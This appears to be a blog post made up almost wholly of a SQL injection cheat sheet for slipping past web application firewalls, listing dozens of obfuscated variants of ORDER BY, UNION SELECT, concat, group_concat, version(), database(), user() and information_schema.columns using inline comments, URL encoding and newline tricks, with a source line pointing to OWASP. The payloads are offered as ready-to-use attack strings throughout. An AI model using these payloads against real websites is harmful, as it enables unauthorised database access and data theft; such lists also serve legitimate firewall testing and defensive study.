/*!ORDER*/ BY 1
/*!ORDER/**/BY*/ 1
/*!50000ORDER*/ BY 1
/*!50000ORDER BY*/ 1
/**_**/ORDER/**_**/ /**_**/BY/**_**/ 1
/**//**_**/ORDER/**_**//**/ /**//**_**/BY/**_**/ /**/ 1
/**/OR/**/DER BY 1
ORDER BY 1
ORDER BY 1
%0AORDER%0A %0ABY%0A 1
ORDER BY (1)--
[#] Bypass Concat() [#]
/*!concat*/()
/*!50000concat*/()
/**//concat/**/()
/**/con/**/cat/**/()
concat/**_**/()
/**_**/concat/**_**/()
concat()
concat()
concat()
%0Aconcat()
concat%0A()
%0Aconcat%0A()
[#] Bypass Group_concat() [#]
/*!Group_concat*/()
/*!50000group_concat*/()
/**//group_concat/**/()
/**/Gro/**/up_con/**/cat/**/()
group_concat/**_**/()
/**_**/group_concat/**_**/()
group_concat()
group_concat()
group_concat()
%0Agroup_concat()
group_concat%0A()
%0Agroup_concat%0A()
[#] Bypass version() [#]
/*!version*/()
/*!50000version*/()
/**//version/**/()
/**/ver/**/sion/**/()
version/**_**/()
/**_**/version/**_**/()
version()
version()
version()
%0Aversion()
version%0A()
%0Aversion%0A()
[#]Bypass database()[#]
/*!database*/()
/*!50000database*/()
/**//database/**/()
/**/data/**/base/**/()
database/**_**/()
/**_**/database/**_**/()
database()
database()
database()
%0Adatabase()
database%0A()
%0Adatabase%0A()
[#]Bypass user()[#]
/*!user*/()
/*!50000user*/()
/**//user/**/()
/**/us/**/er/**/()
user/**_**/()
/**_**/user/**_**/()
user()
user()
user()
%0Auser()
user%0A()
%0Auser%0A()
[#]Bypass from [#]
/*!from*/
/*!50000from*/
from
from
%0Afrom
from%0A
%0Afrom%0A
%0ATWA%0Afrom%0ATWA%0A
[#]Bypass information_schema.columns [#]
/*!information_schema.columns*/
/*!information_schema*/.columns
/*!50000information_schema*/.columns
/*!50000information_schema.columns*/
/**_**/information_schema/**_**/.columns
/**/information_schema/**/.columns
/**/information_sch/**/ema/**/.columns
information_sch/**/ema.columns
information_schema.columns
%0Ainformation_schema.columns
[#]Bypass union select [#]
/*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+
UNION SELECT
UNION SELECT
UNION SELECT
UNION SELECT
%0AUNION%0ASELECT%0A sumber : https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
No comments:
Post a Comment